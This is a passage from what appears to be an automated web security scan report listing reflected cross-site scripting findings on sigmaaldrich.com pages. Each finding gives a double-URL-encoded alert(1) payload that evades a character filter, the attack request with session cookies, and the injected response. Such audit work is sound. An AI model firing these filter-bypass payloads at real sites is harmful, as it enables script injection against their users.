Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:38 GMT
Content-Length: 28968
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/customer-support/customer-service10095";alert(1)//531c73a07c2/about-us","E404") ;
   </script>
...[SNIP]...

1.145. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/about-us [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/about-us

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 74c96%2522%253balert%25281%2529%252f%252feb0664a475a was submitted in the REST URL parameter 5. This input was echoed as 74c96";alert(1)//eb0664a475a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/customer-support/customer-service/about-us74c96%2522%253balert%25281%2529%252f%252feb0664a475a HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:39 GMT
Content-Length: 28968
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/customer-support/customer-service/about-us74c96";alert(1)//eb0664a475a","E404") ;
   </script>
...[SNIP]...

1.146. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/about-us/meetings-and-shows [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/about-us/meetings-and-shows

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4379b%2522%253balert%25281%2529%252f%252f6c1d23627a2 was submitted in the REST URL parameter 1. This input was echoed as 4379b";alert(1)//6c1d23627a2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content4379b%2522%253balert%25281%2529%252f%252f6c1d23627a2/sigma-aldrich/customer-support/customer-service/about-us/meetings-and-shows HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:33 GMT
Content-Length: 28987
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content4379b";alert(1)//6c1d23627a2/sigma-aldrich/customer-support/customer-service/about-us/meetings-and-shows","E404") ;
   </script>
...[SNIP]...

1.147. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/about-us/meetings-and-shows [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/about-us/meetings-and-shows

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8f00c%2522%253balert%25281%2529%252f%252f5533200960d was submitted in the REST URL parameter 2. This input was echoed as 8f00c";alert(1)//5533200960d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich8f00c%2522%253balert%25281%2529%252f%252f5533200960d/customer-support/customer-service/about-us/meetings-and-shows HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:36 GMT
Content-Length: 28987
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich8f00c";alert(1)//5533200960d/customer-support/customer-service/about-us/meetings-and-shows","E404") ;
   </script>
...[SNIP]...

1.148. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/about-us/meetings-and-shows [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/about-us/meetings-and-shows

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload be42d%2522%253balert%25281%2529%252f%252f7beaebf6c6f was submitted in the REST URL parameter 3. This input was echoed as be42d";alert(1)//7beaebf6c6f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/customer-supportbe42d%2522%253balert%25281%2529%252f%252f7beaebf6c6f/customer-service/about-us/meetings-and-shows HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:38 GMT
Content-Length: 28987
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/customer-supportbe42d";alert(1)//7beaebf6c6f/customer-service/about-us/meetings-and-shows","E404") ;
   </script>
...[SNIP]...

1.149. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/about-us/meetings-and-shows [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/about-us/meetings-and-shows

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3d497%2522%253balert%25281%2529%252f%252f5ad6fd6b06e was submitted in the REST URL parameter 4. This input was echoed as 3d497";alert(1)//5ad6fd6b06e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/customer-support/customer-service3d497%2522%253balert%25281%2529%252f%252f5ad6fd6b06e/about-us/meetings-and-shows HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
